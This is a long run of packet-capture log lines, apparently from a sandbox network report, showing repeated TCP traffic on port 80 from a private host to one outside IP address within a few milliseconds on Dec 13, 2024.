                                                              Dec 13, 2024 07:47:47.370430946 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370450974 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370471954 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370491028 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370512962 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370534897 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370559931 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370579958 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370599985 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370619059 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370640993 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370661974 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370681047 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370701075 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370719910 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370738029 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370758057 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370775938 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370795012 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370829105 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370835066 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370855093 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370872974 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370893002 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370912075 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370933056 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370950937 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370970011 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370990038 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371006966 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371023893 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371043921 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371064901 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371084929 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371104002 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371124983 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371140957 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371160984 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371177912 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371196032 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371217012 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371234894 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371253967 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371273994 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371293068 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371310949 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371329069 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371351957 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371370077 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371387959 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371407032 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371436119 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371443033 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371470928 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371490002 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371512890 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371531963 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371550083 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371570110 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371592999 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371611118 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371630907 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371648073 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371665955 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371686935 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371706009 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371723890 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371742010 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371762037 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371781111 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371800900 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371819973 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371838093 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371857882 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371876001 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371893883 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371912956 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371931076 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371949911 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371968985 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.371988058 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372006893 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372028112 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372047901 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372072935 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372087955 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372107983 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372128010 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372145891 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372164965 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372183084 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372203112 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372220993 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372240067 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372257948 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372276068 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372297049 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372318029 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372337103 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372355938 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372375011 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372396946 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372416973 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372433901 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372452021 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372472048 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372489929 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372508049 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372525930 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372544050 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372565985 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372585058 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372605085 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372623920 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372643948 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372662067 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372679949 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372700930 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372719049 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372736931 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372761965 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372781038 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372798920 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372817039 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372837067 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372854948 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372874022 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372894049 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372910976 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372931957 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372952938 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372971058 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.372987986 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373006105 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373025894 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373044968 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373064995 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373083115 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373101950 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373122931 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373141050 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373162031 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373178005 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373198986 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373218060 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373239040 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373259068 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373275995 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373295069 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373313904 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373332977 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373353004 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373373985 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373395920 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373414040 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373431921 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373450994 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373469114 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373490095 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373507023 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373527050 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373548031 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373564959 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373583078 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373601913 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373620033 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373642921 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373662949 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373681068 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373697996 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373718023 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373735905 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373754978 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373773098 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373795986 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373814106 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373835087 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373852968 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373872042 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373891115 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373908043 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373929977 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373950005 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373970032 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.373989105 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374007940 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374026060 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374056101 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374078035 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374097109 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374115944 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374135971 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374154091 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374174118 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374192953 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374212980 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374233007 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374253988 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374269009 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374289989 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374309063 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374329090 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374346972 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374366999 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374385118 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374403954 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374424934 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374442101 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374473095 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374483109 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374500990 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374520063 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374538898 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374558926 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374577999 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374597073 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374614000 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374634027 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374650955 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374671936 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374691010 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374711037 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374727964 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374749899 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374768019 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374788046 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374804974 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374825954 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374844074 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374865055 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374881983 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374898911 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374917984 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374937057 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374954939 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374974012 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.374991894 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375011921 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375029087 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375052929 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375065088 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375085115 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375102043 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375121117 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375138998 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375158072 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375174999 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375195026 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375214100 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375231981 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375250101 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375269890 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375292063 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375308990 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375328064 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375344038 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375365019 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375386000 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375401020 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375420094 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375438929 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375457048 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375475883 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375498056 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375518084 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375538111 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375555992 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375577927 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375596046 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375614882 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375632048 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375650883 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375668049 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375686884 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375705004 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375722885 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375741005 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375763893 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375778913 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375798941 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375818968 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375837088 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375857115 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375874043 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375891924 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375910997 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375931978 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375950098 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375968933 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.375987053 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376005888 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376024008 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376044035 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376061916 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376080036 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376097918 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376116037 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376133919 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376151085 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376168966 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376187086 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376207113 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376225948 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376244068 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376262903 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376283884 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376298904 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376317978 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376337051 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376354933 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376372099 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376389980 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376409054 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376427889 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376446009 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376465082 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376483917 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376502991 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376522064 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376538992 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376558065 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376574993 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376595020 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376614094 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376632929 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376650095 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376669884 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376686096 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376703978 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376724005 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376743078 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376763105 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376780987 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376797915 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376816034 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376833916 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376854897 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376873016 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376890898 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.376909018 CET4977780192.168.2.4185.81.68.148
